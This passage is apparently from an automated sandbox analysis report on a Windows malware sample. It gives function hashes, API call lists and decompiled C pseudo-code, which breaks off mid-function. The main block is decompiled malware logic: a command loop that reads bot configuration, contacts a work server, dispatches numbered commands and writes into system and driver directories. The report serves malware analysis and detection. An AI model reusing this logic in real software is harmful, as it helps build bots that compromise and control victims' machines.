                                                                                                                                  • Opcode Fuzzy Hash: f04ce0a36b1e0340726d5e5c72fce4fe20aaa33147c233af0dd5a9c46ca05612
                                                                                                                                  • Instruction Fuzzy Hash: A841EE718083497EEB269664988C7E73BA49B52300F2809FFD496B72D3D7BC4D818759
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 911 ad0e0f-ad0e24 SetErrorMode * 2 912 ad0e2b-ad0e2c 911->912 913 ad0e26 911->913 913->912
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00AD0223,?,?), ref: 00AD0E19
                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00AD0223,?,?), ref: 00AD0E1E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                  • Instruction ID: a9632d23071adbd0ec66f12c24e7b7b65cefad4dbdad83abc177024c35e07623
                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                  • Instruction Fuzzy Hash: D7D012311451287BD7002B94DC09BCD7B1CDF05B62F008411FB0DD9180CB70994046E5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406DC2 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				long _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0x50e39a9a
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x5e5e5e5e;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed
						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0x50e39a9a
				}
				return _t6;
			}










                                                                                                                                  0x00406dc5
                                                                                                                                  0x00406dd5
                                                                                                                                  0x00406de4
                                                                                                                                  0x00406dea
                                                                                                                                  0x00406df1
                                                                                                                                  0x00406df4
                                                                                                                                  0x00406df4
                                                                                                                                  0x00406df6
                                                                                                                                  0x00406df7
                                                                                                                                  0x00406e00
                                                                                                                                  0x00406e24
                                                                                                                                  0x00406e24
                                                                                                                                  0x00406e02
                                                                                                                                  0x00406e14
                                                                                                                                  0x00406e1a
                                                                                                                                  0x00406e22
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406e22
                                                                                                                                  0x00406e2e
                                                                                                                                  0x00406e2e
                                                                                                                                  0x00406e35

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                    • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                    • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                    • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1823874839-0
                                                                                                                                  • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                                                                  • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00416F00 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __encode_pointer.LIBCMTD ref: 00416F07
                                                                                                                                    • Part of subcall function 00416E30: __crt_wait_module_handle.LIBCMTD ref: 00416E7C
                                                                                                                                    • Part of subcall function 00416E30: RtlEncodePointer.NTDLL(?), ref: 00416EB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer__crt_wait_module_handle__encode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2010845264-0
                                                                                                                                  • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction ID: f8527b63a1fa4e1e3ea2e981291df3c9c0dfee618300b93caa5b292de4cdc523
                                                                                                                                  • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction Fuzzy Hash: 4BA0127644430833D00020877803B02390D43C0638F090021F50C051426842E4508097
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD0920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00AD0929
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 560597551-0
                                                                                                                                  • Opcode ID: da867de32a73d219b0bc9e6a28ac5a3a58dd16c851dad49baea75ca192e4b327
                                                                                                                                  • Instruction ID: eb0777e9622a16cb38e332e54065874c7edd3c96b1fc6f0c0f8d9bfaef48390b
                                                                                                                                  • Opcode Fuzzy Hash: da867de32a73d219b0bc9e6a28ac5a3a58dd16c851dad49baea75ca192e4b327
                                                                                                                                  • Instruction Fuzzy Hash: 0D90047034415051DC3035DD0C07F0500411751770F310710F134FF1D5DC44551001FD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 0040C913 Relevance: 113.4, APIs: 45, Strings: 19, Instructions: 1397filestringprocessCOMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E0040C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t491;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				CHAR* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;

				_v64 = 0;
				_v68 = 0;
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					E0040C517();
				}
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					L21:
					__eflags = 0;
					return 0;
				} else {
					 *0x412104 = E0040E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x41210c = E0040E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0040E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x412108 = _t362;
					if( *0x4136b0 != 0) {
						L7:
						_t747 =  *0x413674;
						_t688 =  *0x41366c;
						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0040F428(E00402684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0040F43E(_t368,  &_v640, 0xc8, 0);
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00408F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x413684 = 1;
									 *0x413678 = 0;
									 *0x41367c = 0;
									E0040EA84(1, "localcfg", "ip", _v496);
									_v104 = E0040F04E(0);
									_v100 = _t748;
									E0040EA84(1, "localcfg", "srv_time", _v492);
									E0040EA84(1, "localcfg", "local_time", _v104);
									E00408FB6( &_v440,  &_v640);
									E00408FB6( &_v92,  &_v640);
									E0040EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0040C65C(_v16,  &_v640,  &_v92, 0x412118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x412148 = 0;
										 *0x41215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0040C75D(_v16,  &_v640,  &_v440,  *0x4136b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x41215c);
														if( *(_t789 + 0x41215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0040F1ED(_t789,  &_v96, 0xa);
																E0040E654(E00408C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x4136b0;
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t758 = _v8[0x413300];
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
																					}
																					__eflags = _v64;
																					if(_v64 != 0) {
																						goto L228;
																					}
																					_v39 = 0;
																					_t408 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, 0,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t408;
																					if(_t408 > 0) {
																						goto L24;
																					}
																					goto L228;
																				}
																				_t409 =  *(_t758 + 0x4c);
																				__eflags = _t409;
																				if(_t409 == 0) {
																					goto L225;
																				}
																				_t410 =  *_t409( &_v76,  &_v39,  *0x4136b0, 0x100000);
																				while(1) {
																					_t811 = _t811 + 0x10;
																					_v52 = _t410;
																					__eflags = _t410;
																					if(_t410 <= 0) {
																						break;
																					}
																					_t413 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t410,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t413;
																					if(_t413 <= 0) {
																						_v64 = 1;
																						goto L225;
																					}
																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x4136b0, 0x100000);
																				}
																				goto L225;
																			}
																			break;
																		}
																		_t416 = E00407DD6(_t748);
																		__eflags = _t416;
																		if(_t416 != 0) {
																			goto L215;
																		}
																		_t417 = E0040F04E(0);
																		__eflags =  *0x4136ac - _t748;
																		if(__eflags > 0) {
																			goto L215;
																		}
																		if(__eflags < 0) {
																			L209:
																			__eflags =  *0x4121a8; // 0x0
																			if(__eflags == 0) {
																				goto L215;
																			}
																			__eflags =  *0x4121a4; // 0x0
																			if(__eflags != 0) {
																				L214:
																				_t418 =  *0x4136b0;
																				 *_t418 = 0;
																				_t733 =  *0x4121a4; // 0x0
																				_t418[4] = _t733;
																				_t734 =  *0x4122d4; // 0x0
																				_t418[8] = _t734;
																				_v39 = 0x34;
																				_t421 = E0040C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
																				_t811 = _t811 + 0x18;
																				__eflags = _t421;
																				if(_t421 <= 0) {
																					break;
																				}
																				goto L215;
																			}
																			_t791 = E0040675C(0x4121a8,  &_v72, 0);
																			_t811 = _t811 + 0xc;
																			__eflags = _t791;
																			if(_t791 != 0) {
																				 *0x4122d4 = E004024C2(_t791, _v72, 0);
																				 *0x4121a4 = _v72;
																				E0040EC2E(_t791);
																				_t811 = _t811 + 0x10;
																			}
																			__eflags =  *0x4121a4; // 0x0
																			if(__eflags == 0) {
																				goto L215;
																			} else {
																				goto L214;
																			}
																		}
																		__eflags =  *0x4136a8 - _t417;
																		if( *0x4136a8 > _t417) {
																			goto L215;
																		}
																		goto L209;
																	}
																	E0040E854(1, "localcfg", "except_info",  *0x4136b0, 0x100000, 0x410264);
																	_t428 =  *0x4136b0;
																	_t811 = _t811 + 0x18;
																	_t736 =  &(_t428[1]);
																	do {
																		_t748 =  *_t428;
																		_t428 =  &(_t428[1]);
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_t429 = _t428 - _t736;
																	_v12 = _t429;
																	__eflags = _t429;
																	if(_t429 <= 0) {
																		goto L204;
																	}
																	E0040E8A1(_t748, 1, "localcfg", "except_info", 0x410264);
																	_v39 = 0xf;
																	_t434 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _v12,  &_v52);
																	_t811 = _t811 + 0x28;
																	__eflags = _t434;
																	if(_t434 <= 0) {
																		break;
																	}
																	goto L204;
																}
																_t760 = 0;
																__eflags =  *0x412184; // 0x0
																if(__eflags != 0) {
																	E00406F5F( &_v408, 0x120);
																	_t449 =  *0x412130; // 0x0
																	_push(0x412184);
																	asm("sbb eax, eax");
																	_push( &_v408);
																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
																	__eflags = _t453;
																	_push(_t453);
																	_push( *0x412159 & 0x000000ff);
																	_push( *0x412134);
																	_push( *0x412120);
																	_t456 = wsprintfA( *0x4136b0, E00402544("PromptOnSecureDesktop", 0x410fa0, 0x27, 0xe4, 0xc8));
																	_t811 = _t811 + 0x34;
																	_t760 = _t456;
																}
																_t793 =  *0x4122d8; // 0x0
																__eflags = _t793;
																if(_t793 == 0) {
																	L193:
																	__eflags = _t760;
																	if(_t760 == 0) {
																		goto L199;
																	}
																	_v39 = 0xb;
																	_t438 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t760,  &_v52);
																	_t811 = _t811 + 0x18;
																	__eflags = _t438;
																	if(_t438 <= 0) {
																		break;
																	}
																	__eflags =  *0x412184; // 0x0
																	if(__eflags != 0) {
																		 *0x412184 = 0;
																	}
																	_t439 =  *0x4122d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0040EC2E(_t439);
																		 *0x4122d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	E0040EE08( &(( *0x4136b0)[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0040C06C( &_v24,  &_v39,  *0x4136b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x4136b0);
														_t463 = E0040E7B4();
														__eflags = _t463;
														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E00403A00(_t697,  *0x4136b0);
													_v39 = 3;
													_t472 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E00403C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
													_push( *0x4136b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0040DF4C(_t748,  *0x4136b0);
												__eflags = _t479;
												if(_t479 != 0) {
													E0040ED3B( &(( *0x4136b0)[4]), "work_srv", 8);
													_t483 =  *0x4136b0;
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0040EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x413680 = 0;
															 *0x413674 = 0;
															 *0x413678 = 0;
															 *0x41367c = 0;
															E0040C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E004031D0( *0x4136b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t488 =  *(_t763 + 0x413300);
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x4136b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x4136b0;
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t491 = _t764;
													_t797 =  &(( *0x4136b0)[4 + _t491 * 8]);
													_t492 = _v52 + 4 + _t491 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0040EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x41201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
																}
																 *_t797 = _t617;
															}
															_t501 =  *_t797;
															__eflags = _t501;
															if(_t501 >= 0) {
																__eflags = _t711 & _t501;
																if((_t711 & _t501) == 0) {
																	__eflags = _t501 & 0x00000200;
																	if((_t501 & 0x00000200) == 0) {
																		__eflags = _t501 & 0x00000400;
																		if((_t501 & 0x00000400) == 0) {
																			goto L96;
																		}
																		GetSystemDirectoryA( &_v408, 0x100);
																		_t595 =  &_v408;
																		_t775 = _t595 + 1;
																		do {
																			_t723 =  *_t595;
																			_t595 = _t595 + 1;
																			__eflags = _t723;
																		} while (_t723 != 0);
																		_t596 = _t595 - _t775;
																		__eflags = _t596;
																		if(_t596 != 0) {
																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
																			}
																		}
																		E0040EF1E( &_v408, "drivers\\");
																		_t776 =  &_v408;
																		_t141 = _t776 + 1; // 0x5d
																		_t711 = _t141;
																		do {
																			_t599 =  *_t776;
																			_t776 = _t776 + 1;
																			__eflags = _t599;
																		} while (_t599 != 0);
																		_t765 = _t776 - _t711;
																		__eflags = _t765;
																		goto L96;
																	}
																	GetSystemDirectoryA( &_v408, 0x100);
																	_t777 =  &_v408;
																	_t602 = _t777 + 1;
																	do {
																		_t711 =  *_t777;
																		_t777 = _t777 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t777 - _t602;
																	__eflags = _t765;
																	goto L83;
																} else {
																	GetEnvironmentVariableA(E00402544(0x4122f8, 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																	E0040EE2A(_t711, 0x4122f8, 0, 0x100);
																	_t607 =  &_v408;
																	_t811 = _t811 + 0x20;
																	_t779 = _t607 + 1;
																	do {
																		_t711 =  *_t607;
																		_t607 = _t607 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t607 - _t779;
																	L83:
																	__eflags = _t765;
																	if(_t765 == 0) {
																		goto L96;
																	}
																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
																	goto L85;
																}
															} else {
																_t780 =  &(_t797[4]);
																_t609 =  &(_t797[4]);
																_t726 =  &(_t609[1]);
																goto L69;
																do {
																	L71:
																	_t711 =  *_t613;
																	_t613 = _t613 + 1;
																	__eflags = _t711;
																} while (_t711 != 0);
																_t765 = _t613 - _t781;
																__eflags = _t765;
																if(_t765 == 0) {
																	L96:
																	__eflags =  *_t797 & 0x00000004;
																	if(( *_t797 & 0x00000004) == 0) {
																		_t502 =  &(_t797[0x104]);
																		L106:
																		_push(_t502);
																		L107:
																		lstrcatA( &_v408, ??);
																		L108:
																		__eflags =  *_t797 & 0x00000040;
																		if(( *_t797 & 0x00000040) != 0) {
																			E00408E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
																			_t811 = _t811 + 0x18;
																		}
																		__eflags = _v39 - 0xc;
																		if(_v39 == 0xc) {
																			_t583 = E0040EE95( &_v408, ".dat");
																			_pop(_t711);
																			__eflags = _t583;
																			if(_t583 != 0) {
